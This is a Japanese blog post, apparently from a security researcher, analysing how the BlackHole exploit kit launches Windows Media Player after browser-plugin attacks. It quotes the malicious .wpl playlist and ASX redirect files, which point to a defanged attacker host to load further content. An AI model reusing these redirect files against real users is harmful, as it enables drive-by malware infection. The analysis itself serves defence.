BlackHole 悪用ツール キットにより Windows Media Player などが悪用される


By Mike Johnson

先日 BlackHole 悪用ツール キットに関する記事を掲載しましたが、それに関連して今回は私の仕事の一部で、私が心から楽しんでる “悪用コードの動作確認” についてお話したいと思います。

BlackHole 悪用ツール キットによってアクセスされるいくつかの有効な URL について調査していると、おかしなことに気づきました。不正なコードが含まれているサイトにいつもリダイレクトされ、その先の Web ページに誘導されるのです。

BlackHole 悪用ツール キットへのリダイレクトが開始されると、いつものような攻撃が行われているのがわかりましたが、それは、まず Internet Explorer、次に Adobe Flash、その次に Adobe Reader、Java の順に行われました。

今回は、その動作はそこで止まりませんでした。Internet Explorer の次に Windows Media Player が起動したのです。Windows Media Player をそのテスト マシンで使用したことはなかったので、一連のインストール ステップが開始され、セットアップ画面が表示されて、インストールの終了まで進みそうでした。

私は Windows Media Player でどのようなことが実行されるのか知りたくなったのですが、残念ながらその時はファイルがダウンロードされる場所を確認できず、使用されているネットワーク アナライザーの種類も特定できませんでした。

これは、この悪用ツール キットを実行する人物が埋め込んだ何らかのリクエストの可能性があります。下のスクリーンショットを見ると、明らかに Windows Media Player によって何らかのネットワーク トラフィックが開始されようとしています。

Internet Explorer によって Windows Media Player が起動するとすぐに、次のような Windows Media Player ファイルがダウンロードされ、実行されるようです。 (\%userprofile%\Application Data\Microsoft\Media Player\********.wpl)

このファイルには小さなプログラムが埋め込まれており、それによって、既定で Windows Media Player に不正な URL が読み込まれるようです。その wpl ファイルの内容は次のようになっています。

<?wpl version=”1.0″?>
<smil>
<head>
<meta name=”Generator” content=”Microsoft Windows Media Player — 9.0.0.4503″/>
<title/>
</head>
<body>
<seq>
<media src=”hxxp://[removed].com/content/hcp_asx.php?f=26″/>
</seq>
</body>
</smil>

この URL により、次のようなページにリダイレクトされます。

<ASX VERSION=”3.0″><PARAM name=’HTMLView’ value=”http://[removed].com/content/pch.php?f=26″/><ENTRY><REF href=”http://[removed].com/content/1×1.gif”/></ENTRY></ASX>

この動作は Windows XP SP3 上の Internet Explorer 8 と Windows Media Player 9.0.0.4503 でテストしただけで、Windows Vista または Windows 7 でこの悪用コードが実行されるかは現在のところ確認できていません。

この件が私の注意を引いた主な理由は、Windows Media Player のほとんどの更新プログラム (すべてではありませんが) はオプションの更新プログラムのみに含まれていて、多くの人が利用するマイクロソフト セキュリティ情報の重要な更新プログラムには含まれていないためです。

wordpress blog stats